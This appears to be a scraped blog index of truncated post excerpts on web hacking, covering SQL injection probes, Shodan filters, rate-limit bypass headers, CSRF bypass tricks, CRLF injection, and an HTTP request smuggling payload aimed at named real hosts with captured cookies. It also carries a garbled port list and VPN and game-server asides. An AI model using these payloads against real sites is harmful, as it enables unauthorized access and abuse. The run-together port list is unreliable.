Port list for Angry Port Scanner (feel free to copy+paste into options) 71920-212223254243495367-686970798088102110113119123135137-139143161-162177179201264318381-383389411-412443445464465497500512513514515520521540554546-547560563587591593631636639646691860873902989-99099399510251026-102910801080119412141241131113371433-143415121589170117231725174117551812-1813186319852000200220492082-208321002222223523022483-2484274529673050307431243127312832223260330633893689369037243784-3785433344444664467248995000500150015004-50055050506051905222-52235432550055545631-5632580059006000-60016112612962576346-63476500656665886665-66696679669766996881-69996891-6901697072127648-7649800080808086-808781008118820085008767886691009101-910391199800989899889999100001000010113-101161137112035-120361234513720-137211456715118192261963820000248002599927015273742896031337
Month: February 2023
Mullvad VPN
$5 VPN (why are you not using it yet???) go get it here Completely anonymous, no signing up, accepts crypto, no logs. Stop wasting money on shit VPN service.
SQL Injection
How to find SQL injection vulnerability?1) Logical OperationOne of the best ways to confirm a SQL injection is by making it operate a logical operation and having the expected results. For example: if theGET parameter ?username=Slacker returns the same content as ?username=Slacker’ or ?username=Slacker+’1’=’1 then, you found a SQLinjection.2) Time Based SQL InjectionMost relative place…
Interesting Shodan Filters
» city » country nginx city:”San Diego” country:US » geo Devices within a 50km radius of San Diego (32.8,-117): geo:32.8,-117,50 » hostname “Server: gws” hostname:google » net net:216.219.0.0/16 » os microsoft-iis os:”windows 2003″ » before/ after apache country:CH after:22/03/2010 before:4/6/2010 » port proftpd port:21 21 (FTP) 22 (SSH) 23 (Telnet) 25 (SMTP) 53 (DNS) 80…
Play WoW for free
Download the Mists client https://download.stormforge.gg/WoW_548.torrent Change your realmlist Change your wtf/config.wtf file Go to your game directory and open “config.wtf” file using a text editor, such as notepad. Change line which contains the realmlist to: “set realmlist logon.stormforge.gg” If you encounter a problem with saving it, make sure the realmlist file is NOT set to…
Arch Linux
OS install guide – https://wiki.archlinux.org/title/installation_guide Installing Yay – https://www.tecmint.com/install-yay-aur-helper-in-arch-linux-and-manjaro/ Install Black Arch repositories – https://www.fosslinux.com/17105/how-to-install-blackarch-repositories-on-arch-linux.htm
rate limit bypass
imageimagehttps://huzaifa-tahir.medium.com/methods-to-bypass-rate-limit-5185e6c67ecd2.Rate Limit Bypass Headers:Most Application’s use X-Forwarded-For common method for identifying the originating IP address of the client. We All know that using XForwarded-For: IP Header Can sometime’s Bypass Ratelimit Protection. Sometimes Adding Two Times X-Forwarded-For: IP Header Instead of Onetime Can Bypass Ratelimit ProtectionX-Forwarded: 127.0.0.1X-Forwarded-By: 127.0.0.1X-Forwarded-For: 127.0.0.1X-Forwarded-For-Original: 127.0.0.1X-Forwarded-For-Ip: 127.0.0.1X-Forwarded-Host: 127.0.0.1X-Forward-For: 127.0.0.1Forwarded: 127.0.0.1Forwarded-For: 127.0.0.1Forwarded-For-Ip: 127.0.0.1X-Originating-IP:…
http Request smuggling
TPOST /login HTTP/1.1Host: staging-login.newrelic.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/70.0.3508.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8Accept-Encoding: gzip, deflateCookie: optimizelyEndUserId=oeu1547215128308r0.023321653201122228; ajs_user_id=null; ajs_group_id=null; ajs_anonymous_id=%22a5f7b9bb-8c8a-4add-ac69-75200d4c46cb%22;Content-Type: application/x-www-form-urlencodedContent-Length: 189Transfer-Encoding: chunkedTransfer-Encoding: foo 3ereturn_to=https%3A%2F%2Fstaging-insights-embed.newrelic.com%2F0 GET / HTTP/1.1Host: staging-login.newrelic.com:123X-Forwarded-Host: skeletonscribe.netContent-Length: 10 x= DELETE / HTTP/1.1Transfer-Encoding: chunkedHost: api.zomato.comContent-Length: 91User-Agent: Treasure/6.7 0 GET https://YOUR_COLLAB_URL/desync/ HTTP/1.1X: X Safari/537.36TSNGUID=6093d809-7d9d-4d52-bfb9-335de9fb69b8; _ga=GA1.2.1374597116.1547216490; _gid=GA1.2.1093027572.1547216490; _gcl_au=1.1.1026642629.1547216493; _mkto_trk=id:412-MZS-894&token:_mch-newrelic.com-1547216493639-15775; __qca=P0-235566894-1547221374728; intercom-id-cyym0u3i=bd3a0989-6e9f-4e6d-a497-9a41ef6d5290; _fbp=fb.1.1547249472663.621468648; ei_client_id=5c39274682f6eb000fa6d52a; _golden_gate_session=bkRPMUZ3STBrY0laZG0zemY1Umg5cFVhcWpNaGpvZWN2T0tOM3hWL2p2UVdaVTJLZFh5NkJtQnZHV2FIR3hnZWpKaWFvM2F2WkRab3hjWTd5b3A1T2dOY20zWWNQaFhZNWVRZXFuRkFwU3l1YVZMdm1JSW9pSGd0UnRicnRBUVdhaGg3UXJQTFJ0c3ZkMHRyaHZqNjYreCt4dWUwVlp1UTdrSVFpSEx6akVITjRWWGNrSUR5NGdIdG80UnFJS2xpVTNlU1BpK0hjWEZJMVF1R2I4RlNNeUdicVdTWFVDQnBlQ0NQSXdNYXFJM2lDTWc5VldLOTJ3N1A3Wll5RytpZVNya2J1WTdTNUZ5UVFRNk5KVmt2TmNudlU3WDFQMVJPbGtkWXJJWXd1YjA9LS1MeU1EbTkrZ29qVVo2VkNUMDhnMVp3PT0%3D–155cef8a5f5d2bcb69b1d1952af040a3479aeacb; _gat=1GET…
CSRF bypass
1- Change single char 2- Sending empty value of token 3- Replace with same length 4- Clickjacking 5- Changing POST/GET method 6- RemoveCSRF parameter from request 7- Use another users’s valid token 8- CSRF protection by Referer header? Remove the header [ADD in form ] 9-Bypass using subdomain [victim.com.attacker.com] 10- Try to decrypt hash(maybe CSRF…
CRLF injection
CRLFThe term CRLF refers to Carriage Return (ASCII 13, \r) Line Feed (ASCII 10, \n). They’re used to note the termination of a line,however, dealt with differently in today’s popular Operating Systems. For example: in Windows both a CR and LF are required to notethe end of a line, whereas in Linux/UNIX a LF is…